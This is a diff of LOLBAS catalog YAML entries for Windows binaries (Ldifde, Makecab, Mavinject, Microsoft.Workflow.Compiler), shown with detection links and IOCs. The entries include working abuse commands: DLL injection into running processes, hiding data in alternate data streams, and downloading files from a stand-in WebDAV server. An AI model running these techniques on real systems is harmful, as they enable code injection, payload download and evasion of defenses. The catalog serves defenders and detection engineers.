https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml +- IOC: Jsc.exe should normally not run a system unless it is used for development. Resources: - - Link: https://twitter.com/DissectMalware/status/998797808907046913 - - Link: https://www.phpied.com/make-your-javascript-a-windows-exe/ +- Link: https://twitter.com/DissectMalware/status/998797808907046913 +- Link: https://www.phpied.com/make-your-javascript-a-windows-exe/ Acknowledgement: - - Person: Malwrologist - Handle: '@DissectMalware' +- Person: Malwrologist + Handle: '@DissectMalware' diff --git a/yml/OSBinaries/Ldifde.yml b/yml/OSBinaries/Ldifde.yml index cfc974ef..75babfbc 100644 --- a/yml/OSBinaries/Ldifde.yml +++ b/yml/OSBinaries/Ldifde.yml @@ -1,30 +1,32 @@ ---- Name: Ldifde.exe Description: Creates, modifies, and deletes LDAP directory objects. -Author: 'Grzegorz Tworek' +Author: Grzegorz Tworek Created: 2022-08-31 Commands: - - Command: Ldifde -i -f inputfile.ldf - Description: Import inputfile.ldf into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder. - Usecase: Download file from Internet - Category: Download - Privileges: Administrator - MitreID: T1105 - OperatingSystem: Windows Server with AD Domain Services role, Windows 10 with AD LDS role. +- Command: Ldifde -i -f inputfile.ldf + Description: Import inputfile.ldf into LDAP. If the file contains http-based attrval-spec + such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded + into IE temp folder. + Usecase: Download file from Internet + Category: Download + Privileges: Administrator + MitreID: T1105 + OperatingSystem: Windows Server with AD Domain Services role, Windows 10 with AD + LDS role. Full_Path: - - Path: c:\windows\system32\ldifde.exe - - Path: c:\windows\syswow64\ldifde.exe +- Path: c:\windows\system32\ldifde.exe +- Path: c:\windows\syswow64\ldifde.exe Code_Sample: - - Code: +- Code: null Detection: - - IOC: - - Analysis: - - Sigma: - - Elastic: - - Splunk: - - BlockRule: +- IOC: null +- Analysis: null +- Sigma: null +- Elastic: null +- Splunk: null +- BlockRule: null Resources: - - Link: https://twitter.com/0gtweet/status/1564968845726580736 +- Link: https://twitter.com/0gtweet/status/1564968845726580736 Acknowledgement: - - Person: Grzegorz Tworek - Handle: '@0gtweet' +- Person: Grzegorz Tworek + Handle: '@0gtweet' diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml index 7cf425b2..ce9577e0 100644 --- a/yml/OSBinaries/Makecab.yml +++ b/yml/OSBinaries/Makecab.yml @@ -1,42 +1,47 @@ ---- Name: Makecab.exe Description: Binary to package existing files into a cabinet (.cab) file -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab - Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. - Usecase: Hide data compressed into an alternate data stream - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab - Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. - Usecase: Hide data compressed into an alternate data stream - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab - Description: Download and compresses the target file and stores it in the target file. - Usecase: Download file and compress into a cab file - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab + Description: Compresses the target file into a CAB file stored in the Alternate + Data Stream (ADS) of the target file. + Usecase: Hide data compressed into an alternate data stream + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab + Description: Compresses the target file into a CAB file stored in the Alternate + Data Stream (ADS) of the target file. + Usecase: Hide data compressed into an alternate data stream + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab + Description: Download and compresses the target file and stores it in the target + file. + Usecase: Download file and compress into a cab file + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\System32\makecab.exe - - Path: C:\Windows\SysWOW64\makecab.exe +- Path: C:\Windows\System32\makecab.exe +- Path: C:\Windows\SysWOW64\makecab.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml - - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - - IOC: Makecab retrieving files from Internet - - IOC: Makecab storing data into alternate data streams +- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml +- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml +- IOC: Makecab retrieving files from Internet +- IOC: Makecab storing data into alternate data streams Resources: - - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: - - Person: Oddvar Moe - Handle: '@oddvarmoe' +- Person: Oddvar Moe + Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index 42a2f5bc..11750db9 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -1,38 +1,41 @@ ---- Name: Mavinject.exe Description: Used by App-v in Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll - Description: Inject evil.dll into a process with PID 3110. - Usecase: Inject dll file into running process - Category: Execute - Privileges: User - MitreID: T1218.013 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" - Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 - Usecase: Inject dll file into running process - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll + Description: Inject evil.dll into a process with PID 3110. + Usecase: Inject dll file into running process + Category: Execute + Privileges: User + MitreID: T1218.013 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" + Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process + with PID 4172 + Usecase: Inject dll file into running process + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\System32\mavinject.exe - - Path: C:\Windows\SysWOW64\mavinject.exe +- Path: C:\Windows\System32\mavinject.exe +- Path: C:\Windows\SysWOW64\mavinject.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mavinject_proc_inj.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/c44b22b52fce406d45ddb6743a02b9ff8c62c7c6/rules/windows/process_creation/sysmon_creation_mavinject_dll.yml - - IOC: mavinject.exe should not run unless APP-v is in use on the workstation +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mavinject_proc_inj.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/c44b22b52fce406d45ddb6743a02b9ff8c62c7c6/rules/windows/process_creation/sysmon_creation_mavinject_dll.yml +- IOC: mavinject.exe should not run unless APP-v is in use on the workstation +- Splunk: https://research.splunk.com/endpoint/ccf4b61b-1b26-4f2e-a089-f2009c569c57/ Resources: - - Link: https://twitter.com/gN3mes1s/status/941315826107510784 - - Link: https://twitter.com/Hexcorn/status/776122138063409152 - - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +- Link: https://twitter.com/gN3mes1s/status/941315826107510784 +- Link: https://twitter.com/Hexcorn/status/776122138063409152 +- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ Acknowledgement: - - Person: Giuseppe N3mes1s - Handle: '@gN3mes1s' - - Person: Oddvar Moe - Handle: '@oddvarmoe' +- Person: Giuseppe N3mes1s + Handle: '@gN3mes1s' +- Person: Oddvar Moe + Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index 0b0050eb..99feaaba 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -1,58 +1,63 @@ ---- Name: Microsoft.Workflow.Compiler.exe -Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code. -Author: 'Conor Richard' +Description: A utility included with .NET that is capable of compiling and executing + C# or VB.net code. +Author: Conor Richard Created: 2018-10-22 Commands: - - Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml - Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file. - Usecase: Compile and run code - Category: Execute - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10S, Windows 11 - - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt - Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. - Usecase: Compile and run code - Category: Execute - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10S, Windows 11 - - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt - Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. - Usecase: Compile and run code - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10S, Windows 11 +- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml + Description: Compile and execute C# or VB.net code in a XOML file referenced in + the test.xml file. + Usecase: Compile and run code + Category: Execute + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10S, Windows 11 +- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt + Description: Compile and execute C# or VB.net code in a XOML file referenced in + the test.txt file. + Usecase: Compile and run code + Category: Execute + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10S, Windows 11 +- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt + Description: Compile and execute C# or VB.net code in a XOML file referenced in + the test.txt file. + Usecase: Compile and run code + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10S, Windows 11 Full_Path: - - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe +- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/win_workflow_compiler.yml - - Splunk: https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml - - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations. - - IOC: The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe - - IOC: Presence of "